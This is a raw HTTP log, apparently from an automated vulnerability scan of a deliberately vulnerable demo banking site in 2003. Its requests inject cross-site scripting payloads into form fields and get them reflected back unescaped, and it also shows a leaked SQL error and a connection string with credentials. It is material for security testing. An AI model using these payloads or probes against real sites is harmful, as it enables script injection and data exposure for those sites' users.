<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert("XSS")</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
login=333%2D333%2D3333test@test999.com&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?err=Invalid Login: 333-333-3333test@test999.com
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=>"><script>alert("XSS")</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:31 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=</textarea><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 356
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = </textarea><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert("XSS")</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"><script>alert("XSS")</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:24 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:10 GMT
ETag: "48ad2dfea9dc11:8f6"
Content-Length: 39
<A HREF="./link10/index.htm">Link10</A>GET /cfmerror.html HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "344c36c1a8dc11:8f6"
Content-Length: 1931
</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP><HTML><HEAD><TITLE>Error Occurred While Processing Request</TITLE></HEAD><BODY><HR><H3>Error Occurred While Processing Request</H3><P> <TABLE BORDER><TR><TD><H4>Error Diagnostic Information</H4><P>ODBC Error Code = 37000 (Syntax error or access violation)<P><P> [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'and'.<P><P>SQL = "SELECT announce_id,announce_name title,city,state,ch_date,announce_cat.announce_cat_id,announce_desc text,city,state,contact_name,e_mail,phone,ext,fax,url,addr1,addr2,zip,announce_cat_name FROM announce_info,announce_cat WHERE announce_cat.announce_cat_id=announce_info.announce_cat_id and sport_code=1 and announce_name like'%>%' and announce_info.announce_cat_id= and ch_date>={ts '2001-02-23 08:22:42'} and del_flag=0 order by ch_date desc"<P>Data Source = "TDISCOVERY"<P><p>The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (38:1) to (38:48) in the template file E:\HTTP\TEAMDISCOVERY\Z\QUERIES\ALLANNOUNCESEARCH.CFM.</p><P><P>Date/Time: 03/23/01 08:22:42<BR>Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<BR>Remote Address: 65.80.86.150<BR>Query String: search=%3E&submit=blehbleh&state=&cat_id=<P></TD></TR></TABLE><P><HR>
</BODY></HTML>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:58 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 440
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /web/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:39 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /linking/link1/link2/link3/link4/link5/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:09 GMT
ETag: "608d8bfda9dc11:8f6"
Content-Length: 37
<A HREF="./link6/index.htm">Link6</A>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"><script>alert("XSS")</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=--><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
